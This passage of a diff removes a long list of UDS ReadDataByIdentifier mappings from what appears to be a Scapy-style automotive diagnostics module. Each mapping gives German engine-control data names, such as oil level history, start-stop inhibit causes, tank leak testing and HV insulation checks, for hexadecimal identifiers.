Sauerstoffspeichervermoegen" # or Oelstand Prozent -UDS_RDBI.dataIdentifiers[0x6168] = "Oelstand VolumenGespeichert" -UDS_RDBI.dataIdentifiers[0x6169] = "Kat Diagnose Laeuft" # or Oelstand VolumenGespeichertGefiltert, Katalysatordiagnose laeuft -UDS_RDBI.dataIdentifiers[0x616a] = "Katalysatordiagnose laeuft Links" -UDS_RDBI.dataIdentifiers[0x6170] = "Oelstand KilometertstandLetzteSpeicherung" -UDS_RDBI.dataIdentifiers[0x6171] = "Oelstand StatusErkennung" # or Testerverstellzyklus Nockenwelle Auslass Bank 1 beendet -UDS_RDBI.dataIdentifiers[0x6172] = "Testerverstellzyklus Nockenwelle Auslass Bank 2 beendet" # or Oelstand Oelvolumen -UDS_RDBI.dataIdentifiers[0x6173] = "Testerverstellzyklus Nockenwelle Einlass Bank 1 beendet" # or Oelstand Oelverbrauch, Nockenwelle Einlass Testerverstellzyklus Rechts Beendet -UDS_RDBI.dataIdentifiers[0x6174] = "Oelstand ModellwertOelverduennung" # or Testerverstellzyklus Nockenwelle Einlass Bank 2 beendet -UDS_RDBI.dataIdentifiers[0x6175] = "Oelstand AnzahlSpeicherungen" # or Nockenwellenzustand Auslass -UDS_RDBI.dataIdentifiers[0x6176] = "Nockenwelle Einlass Zustand" # or Nockenwellenzustand Einlass -UDS_RDBI.dataIdentifiers[0x6177] = "Restlaufstrecke Motoroel" -UDS_RDBI.dataIdentifiers[0x6178] = "Restlaufstrecke Min Motoroel" -UDS_RDBI.dataIdentifiers[0x6179] = "Restlaufstrecke Max Motoroel" # or Nockenwelle Auslass Grob Feinadaption Beendet -UDS_RDBI.dataIdentifiers[0x6180] = "Tageszaehler erstmaliges" -UDS_RDBI.dataIdentifiers[0x6181] = "Tageszaehler 9letztes" -UDS_RDBI.dataIdentifiers[0x6182] = "Tageszaehler 8letztes" -UDS_RDBI.dataIdentifiers[0x6183] = "Tageszaehler 7letztes" # or Nockenwellenwinkel Sollwert Einlass -UDS_RDBI.dataIdentifiers[0x6184] = "Tageszaehler 6letztes" -UDS_RDBI.dataIdentifiers[0x6185] = "Tageszaehler 5letztes" -UDS_RDBI.dataIdentifiers[0x6186] = "Tageszaehler 4letztes" -UDS_RDBI.dataIdentifiers[0x6187] = "Tageszaehler 3letztes" -UDS_RDBI.dataIdentifiers[0x6188] = "Tageszaehler vorletztes" -UDS_RDBI.dataIdentifiers[0x6189] = "Tageszaehler letztes" -UDS_RDBI.dataIdentifiers[0x618a] = "Oelstand erstmaliges" -UDS_RDBI.dataIdentifiers[0x618b] = "Oelstand 9letztes" -UDS_RDBI.dataIdentifiers[0x618c] = "Oelstand 8letztes" -UDS_RDBI.dataIdentifiers[0x618d] = "Oelstand 7letztes" -UDS_RDBI.dataIdentifiers[0x618e] = "Oelstand 6letztes" -UDS_RDBI.dataIdentifiers[0x618f] = "Oelstand 5letztes" -UDS_RDBI.dataIdentifiers[0x6190] = "Oelstand 4letztes" -UDS_RDBI.dataIdentifiers[0x6191] = "Oelstand 3letztes" -UDS_RDBI.dataIdentifiers[0x6192] = "Oelstand vorletztes" -UDS_RDBI.dataIdentifiers[0x6193] = "Oelstand letztes" -UDS_RDBI.dataIdentifiers[0x6194] = "Verbrauch fl ssiger Kraftstoff seit RESET" -UDS_RDBI.dataIdentifiers[0x6195] = "Verbrauch fl ssiger Kraftstoff seit START" -UDS_RDBI.dataIdentifiers[0x6196] = "Verbrauch gasf rmiger Kraftstoff seit RESET" -UDS_RDBI.dataIdentifiers[0x6197] = "Verbrauch gasf rmiger Kraftstoff seit START" -UDS_RDBI.dataIdentifiers[0x6198] = "Verbrauch elektrischer Energie seit RESET" -UDS_RDBI.dataIdentifiers[0x6199] = "Verbrauch elektrischer Energie seit Start" -UDS_RDBI.dataIdentifiers[0x619a] = "Distance seit RESET Kraftstoff" -UDS_RDBI.dataIdentifiers[0x619b] = "Distance seit START Kraftstoff" -UDS_RDBI.dataIdentifiers[0x619c] = "Distance seit RESET el Energie" -UDS_RDBI.dataIdentifiers[0x619d] = "Distance seit START el Energie" -UDS_RDBI.dataIdentifiers[0x619e] = "Anzeige ECO Beschleunigung" -UDS_RDBI.dataIdentifiers[0x619f] = "Anzeige ECO Rollen" -UDS_RDBI.dataIdentifiers[0x61a0] = "Anzeige Bonus Reichweite" -UDS_RDBI.dataIdentifiers[0x61a1] = "Anzeige ECO Gesamt" -UDS_RDBI.dataIdentifiers[0x61a2] = "Anzeige ECO Konstanz" -UDS_RDBI.dataIdentifiers[0x61b0] = "Stoppverbot Verursacher Benzinmotor KatWarmUp" -UDS_RDBI.dataIdentifiers[0x61b1] = "Stoppverbot Verursacher Benzinmotor Katheizen" -UDS_RDBI.dataIdentifiers[0x61b2] = "Stoppverbot Verursacher Benzinmotor Diag KG Entlueftung" -UDS_RDBI.dataIdentifiers[0x61b3] = "Stoppverbot Verursacher Benzinmotor Tankentlueftung" -UDS_RDBI.dataIdentifiers[0x61b4] = "Stoppverbot Verursacher Benzinmotor Diag Tankentlueftung" -UDS_RDBI.dataIdentifiers[0x61b5] = "Stoppverbot Verursacher Benzinmotor Gemischadaption" -UDS_RDBI.dataIdentifiers[0x61b6] = "Stoppverbot Verursacher Benzinmotor Erststart" -UDS_RDBI.dataIdentifiers[0x61b7] = "Stoppverbot Verursacher Benzinmotor Diag Abgas" -UDS_RDBI.dataIdentifiers[0x61b8] = "Stoppverbot Verursacher Benzinmotor OPF" -UDS_RDBI.dataIdentifiers[0x61b9] = "Stoppverbot Verursacher Benzinmotor Umgebungsbedingungen" -UDS_RDBI.dataIdentifiers[0x61ba] = "Stoppverbot Verursacher Benzinmotor Geberradadaption" -UDS_RDBI.dataIdentifiers[0x61bb] = "Stoppverbot Verursacher Benzinmotor Thermomanagement" -UDS_RDBI.dataIdentifiers[0x61bc] = "Stoppverbot Verursacher Benzinmotor Zylindergleichstellung" -UDS_RDBI.dataIdentifiers[0x61bd] = "Stoppverbot Verursacher Benzinmotor Testeranforderung Bandende" -UDS_RDBI.dataIdentifiers[0x61c0] = "Start Stopp vorhStartanforderer Benzinmotor" -UDS_RDBI.dataIdentifiers[0x6200] = "Warnspeicherreset Read ASSYST Warnspeicher km Stand Warnspeicherreset" # or Start Stopp Vorbedingungen mech Getriebe -UDS_RDBI.dataIdentifiers[0x6201] = "Start Stopp Fehlerstatus" # or Zaehler Min Schalter Read ASSYST Warnspeicher Zaehler Min Schalter -UDS_RDBI.dataIdentifiers[0x6202] = "Zaehler Min" # or Stoppverbot Verursacher ASSP -UDS_RDBI.dataIdentifiers[0x6203] = "Start Stopp Startanforderer HDC" # or Zaehler Ueberfuellung Read ASSYST Warnspeicher Zaehler Ueberfuellung -UDS_RDBI.dataIdentifiers[0x6204] = "Stoppverbot Verursacher System" # or Zaehler Unterfuellung 2 Read ASSYST Warnspeicher Zaehler Unterfuellung -UDS_RDBI.dataIdentifiers[0x6205] = "Typ erstmaliges Auftreten Read ASSYST Warnspeicher Typ erstmaliges" # or Start Stopp vorhFStatus -UDS_RDBI.dataIdentifiers[0x6206] = "Start Stopp vorhFStatus km Stand" # or Typ 9letztes Auftreten Read ASSYST Warnspeicher Typ 9letztes -UDS_RDBI.dataIdentifiers[0x6207] = "Typ 8letztes Auftreten Read ASSYST Warnspeicher Typ 8letztes" # or Stoppverbot Verursacher STCSys -UDS_RDBI.dataIdentifiers[0x6208] = "Start Stopp Startanforderer STC" # or Typ 7letztes Auftreten Read ASSYST Warnspeicher Typ 7letztes -UDS_RDBI.dataIdentifiers[0x6209] = "Typ 6letztes Auftreten Read ASSYST Warnspeicher Typ 6letztes" # or Start Stopp erweiterte Analyse -UDS_RDBI.dataIdentifiers[0x620a] = "Typ 5letztes Auftreten Read ASSYST Warnspeicher Typ 5letztes" # or Start Stopp Interface MSG CPC -UDS_RDBI.dataIdentifiers[0x620b] = "Start Stopp Interface CPC MSG" # or Typ 4letztes Auftreten Read ASSYST Warnspeicher Typ 4letztes -UDS_RDBI.dataIdentifiers[0x620c] = "Typ 3letztes Auftreten Read ASSYST Warnspeicher Typ 3letztes" # or Startanforderung Hybrid -UDS_RDBI.dataIdentifiers[0x620d] = "Startanforderung Erststart" # or Typ vorletztes Auftreten Read ASSYST Warnspeicher Typ vorletztes -UDS_RDBI.dataIdentifiers[0x620e] = "Typ letztmaliges Auftreten Read ASSYST Warnspeicher Typ letztmaliges" -UDS_RDBI.dataIdentifiers[0x620f] = "Getriebefreigabe Automatgetriebe" -UDS_RDBI.dataIdentifiers[0x6210] = "Sekundaerluft Aktiv" # or erstmaliges Auftreten Read ASSYST Warnspeicher km Stand erstmaliges -UDS_RDBI.dataIdentifiers[0x6211] = "9letztes Auftreten Read ASSYST Warnspeicher km Stand 9letztes" # or Sekundaerluftdiagnose Aktiv, SLS-Diagnose aktiv -UDS_RDBI.dataIdentifiers[0x6212] = "Sekundaerluft Relative Sekundaerluftmasse" # or 8letztes Auftreten Read ASSYST Warnspeicher km Stand 8letztes -UDS_RDBI.dataIdentifiers[0x6213] = "Stoppverbot Verursacher Ringspeicher 4" # or 7letztes Auftreten Read ASSYST Warnspeicher km Stand 7letztes -UDS_RDBI.dataIdentifiers[0x6214] = "Stoppverbot Verursacher Ringspeicher 5" # or Sekundaerluft Relative SL Masse Gefiltert, 6letztes Auftreten Read ASSYST Warnspeicher km Stand 6letztes -UDS_RDBI.dataIdentifiers[0x6215] = "5letztes Auftreten Read ASSYST Warnspeicher km Stand 5letztes" -UDS_RDBI.dataIdentifiers[0x6216] = "Sekundaerluft Relative SL Masse Ventil Check" # or 4letztes Auftreten Read ASSYST Warnspeicher km Stand 4letztes -UDS_RDBI.dataIdentifiers[0x6217] = "3letztes Auftreten Read ASSYST Warnspeicher km Stand 3letztes" -UDS_RDBI.dataIdentifiers[0x6218] = "vorletztes Auftreten Read ASSYST Warnspeicher km Stand vorletztes" -UDS_RDBI.dataIdentifiers[0x6219] = "letztes Auftreten Read ASSYST Warnspeicher km Stand letztes" -UDS_RDBI.dataIdentifiers[0x621a] = "Oeldatensatz erstmaligesAuftreten" # or ID Oeldatensatz erstmaligesAuftreten, Oeldatensatz erstmaligesAuftreten Read ASSYST Warnspeicher ID Oeldatensatz erstmaligesAuftreten -UDS_RDBI.dataIdentifiers[0x621b] = "Oeldatensatz 9letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 9letztes" # or ID Oeldatensatz 9letztes, Oeldatensatz 9letztes -UDS_RDBI.dataIdentifiers[0x621c] = "ID Oeldatensatz 8letztes" # or Oeldatensatz 8letztes, Oeldatensatz 8letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 8letztes -UDS_RDBI.dataIdentifiers[0x621d] = "Oeldatensatz 7letztes" # or Oeldatensatz 7letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 7letztes, ID Oeldatensatz 7letztes -UDS_RDBI.dataIdentifiers[0x621e] = "Oeldatensatz 6letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 6letztes" # or Oeldatensatz 6letztes, ID Oeldatensatz 6letztes -UDS_RDBI.dataIdentifiers[0x621f] = "Oeldatensatz 5letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 5letztes" # or ID Oeldatensatz 5letztes, Oeldatensatz 5letztes -UDS_RDBI.dataIdentifiers[0x6220] = "Oeldatensatz 4letztes" # or Kupplungsschutz km Ueberschreiten Kupplungstemperatur erstmalig, Oeldatensatz 4letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 4letztes, ID Oeldatensatz 4letztes, Tankdichtigkeitspruefung Druckverlustgradient Ist -UDS_RDBI.dataIdentifiers[0x6221] = "ID Oeldatensatz 3letztes" # or Oeldatensatz 3letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz 3letztes, Oeldatensatz 3letztes, Kupplungsschutz Kupplungstemperatur erstmalig, Tankdichtigkeitspruefung Druckverlustgradient Fehlerschwelle -UDS_RDBI.dataIdentifiers[0x6222] = "ID Oeldatensatz vorletztes" # or Oeldatensatz vorletztes, Oeldatensatz vorletztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz vorletztes, Kupplungsschutz Anzahl Halten am Berg Stufe1, Tankdichtigkeitspruefung Aufbaugradient Vorhanden -UDS_RDBI.dataIdentifiers[0x6223] = "Oeldatensatz letztes Auftreten Read ASSYST Warnspeicher ID Oeldatensatz letztes" # or Tankdichtigkeitspruefung Fertig, Oeldatensatz letztes, Kupplungsschutz Anzahl Halten am Berg Stufe2, ID Oeldatensatz letztes -UDS_RDBI.dataIdentifiers[0x6224] = "Kupplungsschutz km Halten am Berg Stufe1" # or Geschwindigkeit erstmaligesAuftreten Read ASSYST Warnspeicher Geschwindigkeit erstmaligesAuftreten, Tankdichtigkeitspruefung -UDS_RDBI.dataIdentifiers[0x6225] = "Geschwindigkeit 9letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 9letztes" # or Kupplungsschutz Kupplungstemperatur Halten am Berg Stufe1, Tankdichtigkeitspruefung Abbruchstatus -UDS_RDBI.dataIdentifiers[0x6226] = "Kupplungsschutz Ringspeicher" # or Tankdichtigkeitspruefung Grobleck Erkannt, Geschwindigkeit 8letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 8letztes -UDS_RDBI.dataIdentifiers[0x6227] = "Geschwindigkeit 7letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 7letztes" # or Tankdichtigkeitspruefung Ausgasung Zu Gross, Kupplungsschutz Ringspeicher Kupplungstemperatur -UDS_RDBI.dataIdentifiers[0x6228] = "Tankdichtigkeitspruefung Aktiv" # or Geschwindigkeit 6letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 6letztes, Kupplungsschutz Ringspeicher km -UDS_RDBI.dataIdentifiers[0x6229] = "Geschwindigkeit 5letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 5letztes" # or Tankdichtigkeitspruefung Sammelabbruch, Kupplungsschutz Ringspeicher Dauer -UDS_RDBI.dataIdentifiers[0x622a] = "Tankdichtigkeitspruefung Unterdruckabbaugradient" # or Geschwindigkeit 4letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 4letztes -UDS_RDBI.dataIdentifiers[0x622b] = "Geschwindigkeit 3letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit 3letztes" -UDS_RDBI.dataIdentifiers[0x622c] = "Geschwindigkeit vorletztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit vorletztes" -UDS_RDBI.dataIdentifiers[0x622d] = "Geschwindigkeit letztes Auftreten Read ASSYST Warnspeicher Geschwindigkeit letztes" -UDS_RDBI.dataIdentifiers[0x6230] = "Tankdichtigkeitspruefung Lambdaregler Abbruch" # or Drehzahl erstmaliges Auftreten Read ASSYST Warnspeicher Drehzahl erstmaliges, Kupplungsschutz Anzahl Kombimeldung Kupplung heiss -UDS_RDBI.dataIdentifiers[0x6231] = "Tankdichtigkeitspruefung Max Abweichung Lambda" # or Kupplungsschutz km letzte Anzeige Kupplung heiss, Drehzahl 9letztes Auftreten Read ASSYST Warnspeicher Drehzahl 9letztes -UDS_RDBI.dataIdentifiers[0x6232] = "Drehzahl 8letztes Auftreten Read ASSYST Warnspeicher Drehzahl 8letztes" # or Tankentlueftung Ausgasungswert -UDS_RDBI.dataIdentifiers[0x6233] = "Kupplungsschutz km erster HauptplausiError" # or Drehzahl 7letztes Auftreten Read ASSYST Warnspeicher Drehzahl 7letztes, Tankentlueftung Zeit Seit Start Minus Parkzeit -UDS_RDBI.dataIdentifiers[0x6234] = "Kupplungsschutz km letzter HauptplausiError" # or Drehzahl 6letztes Auftreten Read ASSYST Warnspeicher Drehzahl 6letztes, Tankdichtigkeitspruefung Basisbedingung Erfuellt -UDS_RDBI.dataIdentifiers[0x6235] = "Drehzahl 5letztes Auftreten Read ASSYST Warnspeicher Drehzahl 5letztes" # or Kupplungsschutz Laufstrecke mit HauptplausiError, Tankdichtigkeitspruefung Freigabebedingung Sperrfehler -UDS_RDBI.dataIdentifiers[0x6236] = "Drehzahl 4letztes Auftreten Read ASSYST Warnspeicher Drehzahl 4letztes" # or Tankdichtigkeitspruefung Freigabebedingung Lambda -UDS_RDBI.dataIdentifiers[0x6237] = "Drehzahl 3letztes Auftreten Read ASSYST Warnspeicher Drehzahl 3letztes" # or Tankdichtigkeitspruefung Freigabebedingung Tankdruck -UDS_RDBI.dataIdentifiers[0x6238] = "Drehzahl vorletztes Auftreten Read ASSYST Warnspeicher Drehzahl vorletztes" # or Tankdichtigkeitspruefung Freigabebedingung Batteriespannung -UDS_RDBI.dataIdentifiers[0x6239] = "Tankdichtigkeitspruefung Freigabebedingung Einspritzventile" # or Drehzahl letztes Auftreten Read ASSYST Warnspeicher Drehzahl letztes, Segelvorbedingung Fahrzustand -UDS_RDBI.dataIdentifiers[0x623a] = "Oeltemperatur erstmaliges Auftreten Read ASSYST Warnspeicher Oeltemperatur erstmaliges" # or Segelausloeser letztes Segeln -UDS_RDBI.dataIdentifiers[0x623b] = "Oeltemperatur 9letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 9letztes" -UDS_RDBI.dataIdentifiers[0x623c] = "Oeltemperatur 8letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 8letztes" # or Segeleintrittsbedingung -UDS_RDBI.dataIdentifiers[0x623d] = "Segelaustrittsbedingung letztes Segeln" # or Oeltemperatur 7letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 7letztes -UDS_RDBI.dataIdentifiers[0x623e] = "Oeltemperatur 6letztes" -UDS_RDBI.dataIdentifiers[0x623f] = "Segelaustrittsbedingungen" # or Oeltemperatur 5letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 5letztes -UDS_RDBI.dataIdentifiers[0x6240] = "Oeltemperatur 4letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 4letztes" # or Tankdichtigkeitspruefung Freigabebedingung Erkannt -UDS_RDBI.dataIdentifiers[0x6241] = "Tankentlueftung Relativer Gemischanteil" # or Relativer Gemischanteil Tankentlueftung, Oeltemperatur 3letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur 3letztes -UDS_RDBI.dataIdentifiers[0x6242] = "Oeltemperatur vorletztes Auftreten Read ASSYST Warnspeicher Oeltemperatur vorletztes" # or Tankentlueftung Massenstrom, Massenstrom Tankentlueftung ins Saugrohr -UDS_RDBI.dataIdentifiers[0x6243] = "Oeltemperatur letztes Auftreten Read ASSYST Warnspeicher Oeltemperatur letztes" -UDS_RDBI.dataIdentifiers[0x6244] = "Aktivkohlefilter Beladung" # or Beladung des Aktivkohlefilters, Segelverbot Verursacher Motor, rel Motorlast erstmaliges Auftreten Read ASSYST Warnspeicher rel Motorlast erstmaliges -UDS_RDBI.dataIdentifiers[0x6245] = "Relative Kraftstoffmasse" # or rel Motorlast 9letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 9letztes, Kraftstoffmasse Relativ -UDS_RDBI.dataIdentifiers[0x6246] = "rel Motorlast 8letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 8letztes" # or Aktivkohlefilter Beladung gefiltert, Beladung des Aktivkohlefilters - gefiltert -UDS_RDBI.dataIdentifiers[0x6247] = "Segelverf gbarkeit" # or rel Motorlast 7letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 7letztes -UDS_RDBI.dataIdentifiers[0x6248] = "rel Motorlast 6letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 6letztes" # or Segelstrategie -UDS_RDBI.dataIdentifiers[0x6249] = "rel Motorlast 5letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 5letztes" -UDS_RDBI.dataIdentifiers[0x624a] = "rel Motorlast 4letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 4letztes" -UDS_RDBI.dataIdentifiers[0x624b] = "Tankentlueftung LPV Sollwert" # or rel Motorlast 3letztes Auftreten Read ASSYST Warnspeicher rel Motorlast 3letztes -UDS_RDBI.dataIdentifiers[0x624c] = "Tankentlueftung aktiv" # or rel Motorlast vorletztes Auftreten Read ASSYST Warnspeicher rel Motorlast vorletztes -UDS_RDBI.dataIdentifiers[0x624d] = "rel Motorlast letztes Auftreten Read ASSYST Warnspeicher rel Motorlast letztes" -UDS_RDBI.dataIdentifiers[0x624e] = "Zaehler Sensorfehler" -UDS_RDBI.dataIdentifiers[0x6250] = "Segeln" # or Restlaufzeit Read ASSYST Serviceintervall Restlaufzeit, Serviceintervall Restlaufzeit -UDS_RDBI.dataIdentifiers[0x6251] = "Strecke seit Oelwechsel Read ASSYST Serviceintervall Strecke seit Oelwechsel" # or Serviceintervall Strecke seit Oelwechsel, Klopfregelung Freigabe, Freigabe Klopfregelung, Segeln Aktiv -UDS_RDBI.dataIdentifiers[0x6252] = "Segeln Anforderung Motor" # or Serviceintervall Restlaufstrecke Anzeige, Restlaufstrecke Anzeige Read ASSYST Serviceintervall Restlaufstrecke Anzeige -UDS_RDBI.dataIdentifiers[0x6253] = "Startlaufstrecke Oelfehlvolumen" # or Lenkwinkel Adaptiert Max, Serviceintervall Startlaufstrecke Oelfehlvolumen, Ladungsbewegungsklappe Freigabe, Startlaufstrecke Oelfehlvolumen Read ASSYST Serviceintervall Startlaufstrecke Oelfehlvolumen -UDS_RDBI.dataIdentifiers[0x6254] = "Serviceintervall Restlaufstrecke Intern" # or Lenkwinkel Adaptiert Max Links -UDS_RDBI.dataIdentifiers[0x6255] = "Restlaufstrecke AdBlue Read ASSYST Serviceintervall Restlaufstrecke AdBlue" -UDS_RDBI.dataIdentifiers[0x6256] = "Schaltlinienverschiebung" # or Istmoment Verbrennungsmotor -UDS_RDBI.dataIdentifiers[0x6257] = "Fehlerspeicher Kilometer Seit Loeschen Read Fehlerspeicher Kilometer Seit Loeschen" # or Sollmoment Verbrennungsmotor, Gefahrene Kilometer seit letztem Fehlerspeicher loeschen oder Powerfail, Fehlerspeicher Kilometer Seit Loeschen F M Veh dist on last clear nvv -UDS_RDBI.dataIdentifiers[0x6258] = "Bedingung Einspritzventile aktiv" # or Istmoment Elektromaschine, Einspritzventile Freigabe -UDS_RDBI.dataIdentifiers[0x6259] = "Sollmoment Elektromaschine" -UDS_RDBI.dataIdentifiers[0x625a] = "Fehlerspeicher Zeit Seit Loeschen Read Fehlerspeicher Zeit Seit Loeschen" # or Fehlerspeicher Zeit Seit Loeschen F M Elapsed time since clear, Sollmoment aus der Momentenkoordination -UDS_RDBI.dataIdentifiers[0x625b] = "Statussignal aus der Momentenkoordination" -UDS_RDBI.dataIdentifiers[0x6260] = "LLDrehzahlbegrenzung Zeitzaehler bis Aktivierung" # or Einspritzung Uebergangskomp Adaptfaktor BA -UDS_RDBI.dataIdentifiers[0x6261] = "Restlaufstrecke Kraftstoff Read 1 ASSYST Serviceintervall Restlaufstrecke Kraftstoff" # or LLDrehzahlbegrenzung Zeitzaehler aktiv -UDS_RDBI.dataIdentifiers[0x6262] = "Einspritzung Uebergangskomp Adaptfaktor VA" # or Serviceintervall Tageszaehler, LLDrehzahlbegrenzung aktuelle Drehzahlgrenze -UDS_RDBI.dataIdentifiers[0x6263] = "Serviceintervall Freigegebene Oelsorten Byte1" # or Lastkurvenvorgabe Hybrid -UDS_RDBI.dataIdentifiers[0x6264] = "Massenstrom Nebenfuellungssignal Korrektur Faktor" # or Korrekturfaktor Massenstrom NFS, Lastkurvenvorgabe Hybrid Fehlerstatus, Serviceintervall Freigegebene Oelsorten Byte2 -UDS_RDBI.dataIdentifiers[0x6265] = "Korrekturfaktor langsamer MSA" # or Serviceintervall Startlaufzeit, Status Hybrid Modus Schalter, Massenstrom Langsamer Abgleich Korrektur -UDS_RDBI.dataIdentifiers[0x6266] = "Korrekturfaktor langsamer MSA (auch bei Fehlerfall in Betrieb)" # or Lastkurvenvorgabe Hybrid zulaessiges min Moment -UDS_RDBI.dataIdentifiers[0x6267] = "Korrekturfaktor Massenstrom NFS (HFM-Fehler o. DK aktiv)" # or Massenstrom Nebenfuellungssignal Korrektur Fehlerfall, Lastkurvenvorgabe Hybrid zulaessiges max Moment -UDS_RDBI.dataIdentifiers[0x6268] = "Massenstrom Schneller Abgleich Korrektur" -UDS_RDBI.dataIdentifiers[0x6269] = "Drosselklappe Leckluftmassenstrom" -UDS_RDBI.dataIdentifiers[0x626a] = "Massenstrom Abgas Kat" -UDS_RDBI.dataIdentifiers[0x626b] = "Abgasmassenstrom im Kat (DE" -UDS_RDBI.dataIdentifiers[0x626c] = "Massenstrom Abgas Hauptkat" -UDS_RDBI.dataIdentifiers[0x626d] = "Abgasmassenstrom Hauptkat (DE" -UDS_RDBI.dataIdentifiers[0x626e] = "Massenstrom Nebenfuellungssignal Korrektur Offset" -UDS_RDBI.dataIdentifiers[0x6270] = "Multiplikative Korrektur von fupsrl" # or MonLev3 trap reason error code -UDS_RDBI.dataIdentifiers[0x6271] = "Offsetkorrektur von pbrintuk w HFM/DSS Adaption" # or MonLev3 last occurred reset type -UDS_RDBI.dataIdentifiers[0x6272] = "Momentenadaption Leerlauf Klima Fahrstufe" # or MonLev3 reset causing core id -UDS_RDBI.dataIdentifiers[0x6273] = "MonLev3 last occurred reset symptom" # or Momentenadaption Leerlauf Fahrstufe -UDS_RDBI.dataIdentifiers[0x6274] = "MonLev3 data error address" # or Momentenadaption Leerlauf Klima -UDS_RDBI.dataIdentifiers[0x6275] = "MonLev3 SMU alarm handler error code0" # or Momentenadaption Leerlauf -UDS_RDBI.dataIdentifiers[0x6276] = "MonLev3 caller stack error address0" -UDS_RDBI.dataIdentifiers[0x6277] = "Momentenadaption Leerlauf Langzeitintegral" # or Delta Moment aus Momentenadaption - zeitl. Mittelwert des I-Anteils -UDS_RDBI.dataIdentifiers[0x6278] = "Anzahl Starts mit Benzin im Oel" -UDS_RDBI.dataIdentifiers[0x6279] = "Adaptierter Max. Lenkwinkel" -UDS_RDBI.dataIdentifiers[0x627a] = "Massenstrom ueber DK Offsetadaption eingeschwungen" -UDS_RDBI.dataIdentifiers[0x6280] = "HV Interlockfehler OpenCableDetection" -UDS_RDBI.dataIdentifiers[0x6281] = "HV Interlockfehler OpenCableDetection Interlock Zeitstempel" -UDS_RDBI.dataIdentifiers[0x6282] = "HV Isolationsfehlererkennung Widerstand Zustand1" -UDS_RDBI.dataIdentifiers[0x6283] = "Status der Wegfahrsperre" # or HV Isolationsfehlererkennung Widerstand Zustand2 -UDS_RDBI.dataIdentifiers[0x6284] = "HV Isolationsfehlererkennung Widerstand Zustand3" -UDS_RDBI.dataIdentifiers[0x6285] = "HV Isolationsfehlererkennung Widerstand Zustand4" -UDS_RDBI.dataIdentifiers[0x6286] = "HV Isolationsfehlererkennung Widerstand Zustand5" -UDS_RDBI.dataIdentifiers[0x6287] = "HV Isolationsfehlererkennung Widerstand Zustand6" -UDS_RDBI.dataIdentifiers[0x6288] = "HV Isolationsfehlererkennung Widerstand Zustand7" -UDS_RDBI.dataIdentifiers[0x6289] = "HV Isolationsfehlererkennung Widerstand Zustand8" -UDS_RDBI.dataIdentifiers[0x628a] = "HV Isolationsfehlererkennung Widerstand Zustand9" -UDS_RDBI.dataIdentifiers[0x628b] = "HV Isolationsfehlererkennung Widerstand Zustand10" -UDS_RDBI.dataIdentifiers[0x6290] = "HV Sperre durch Motorhaube und Klemme15" -UDS_RDBI.dataIdentifiers[0x6291] = "Ueberwachungserweiterung Freigabe" -UDS_RDBI.dataIdentifiers[0x6292] = "Ueberwachungserweiterung Einzelfreigabe" -UDS_RDBI.dataIdentifiers[0x6293] = "Ueberwachungserweiterung MSG Anforderung aktiv" -UDS_RDBI.dataIdentifiers[0x62a0] = "Luefteranforderung Klima" -UDS_RDBI.dataIdentifiers[0x62a1] = "Luefteranforderung Ladelufttemperatur" -UDS_RDBI.dataIdentifiers[0x62a2] = "Luefteranforderung Tube Hybrid" -UDS_RDBI.dataIdentifiers[0x62a3] = "Luefteranforderung Getriebeoeltemperatur" -UDS_RDBI.dataIdentifiers[0x62a4] = "Luefteranforderung allgemein" -UDS_RDBI.dataIdentifiers[0x62a5] = "Luefteranforderung Kuehlmitteltemperatur dynamisch" -UDS_RDBI.dataIdentifiers[0x62a6] = "Luefteranforderung Kuehlmitteltemperatur NT1" -UDS_RDBI.dataIdentifiers[0x62a7] = "Luefteranforderung Kuehlmitteltemperatur NT2" -UDS_RDBI.dataIdentifiers[0x62b0] = "Masseband Widerstand DCDCWandler" -UDS_RDBI.dataIdentifiers[0x62b1] = "Masseband Widerstand Motor" -UDS_RDBI.dataIdentifiers[0x62b2] = "Masseband Widerstand Vertrauensintervall DCDCWandler" -UDS_RDBI.dataIdentifiers[0x62b3] = "Masseband Widerstand Vertrauensintervall Motor" -UDS_RDBI.dataIdentifiers[0x62b4] = "Masseband Widerstandswert gueltig DCDCWandler" -UDS_RDBI.dataIdentifiers[0x62b5] = "Masseband Widerstandswert gueltig Motor" -UDS_RDBI.dataIdentifiers[0x62b6] = "Masseband Spannungsdifferenz" -UDS_RDBI.dataIdentifiers[0x62c0] = "Start Stopp letzter misslungener Autostart km Stand" -UDS_RDBI.dataIdentifiers[0x62c1] = "Start Stopp letzter misslungener Autostart Analysewerte1" -UDS_RDBI.dataIdentifiers[0x62c2] = "Start Stopp letzter misslungener Autostart Analysewerte2" -UDS_RDBI.dataIdentifiers[0x62c3] = "Start Stopp Startanforderer Verursacher System" -UDS_RDBI.dataIdentifiers[0x62c4] = "Start Stopp Startanforderer Verursacher motorisch" -UDS_RDBI.dataIdentifiers[0x62c5] = "Drive Betrebsart aktuell" -UDS_RDBI.dataIdentifiers[0x62c6] = "Drive Betriebsart Aggregate" -UDS_RDBI.dataIdentifiers[0x62c7] = "Drive Aggegrate Zustand" -UDS_RDBI.dataIdentifiers[0x62c8] = "Drive erlaubte 